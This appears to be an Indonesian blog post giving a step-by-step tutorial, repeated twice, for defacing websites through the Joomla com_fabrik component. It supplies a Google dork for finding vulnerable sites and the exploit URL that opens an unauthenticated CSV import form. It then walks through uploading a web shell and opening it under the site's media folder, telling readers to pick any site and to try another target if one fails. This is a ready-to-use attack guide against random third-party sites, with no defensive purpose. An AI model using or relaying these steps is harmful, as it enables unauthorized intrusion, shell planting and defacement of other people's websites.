Cara yang satu ini cukup mudah dilakukan. Dengan menggunakan exploit com_fabrik, kita bisa mengupload shell kita untuk melakukan deface terhadap web tersebut.
Tutornya :
1. Ketik dork berikut ke google : "inurl:index.php?option=com_fabrik" *tanpa tanda kutip (")
2. Akan ada banyak web. Anda buka terserah yang mana anda mau.
3. Setelah dibuka. Masukkan exploit ini :
"index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1" *tanpa tanda kutip (")
Contoh :
www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika tidak berhasil cari target lain dan jika berhasil akan muncul form upload seperti ini :
5. Klik "Choose File" trus masukan shell kamu, dan langsung klik "Import CSV" untuk mengupload
6. Jika sudah, buka shell anda dengan format www.site.com/media/namashellkamu.html
7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.
Sekian ilmu yang dapat saya berikan.
Selamat mencoba :)
Tutornya :
1. Ketik dork berikut ke google : "inurl:index.php?option=com_fabrik" *tanpa tanda kutip (")
2. Akan ada banyak web. Anda buka terserah yang mana anda mau.
3. Setelah dibuka. Masukkan exploit ini :
"index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1" *tanpa tanda kutip (")
Contoh :
www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika tidak berhasil cari target lain dan jika berhasil akan muncul form upload seperti ini :
5. Klik "Choose File" trus masukan shell kamu, dan langsung klik "Import CSV" untuk mengupload
6. Jika sudah, buka shell anda dengan format www.site.com/media/namashellkamu.html
7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tidak mendukung file berformat php maupun html.
Sekian ilmu yang dapat saya berikan.
Selamat mencoba :)
Postingan
0 Comments
Bagaimana Pendapat Anda ?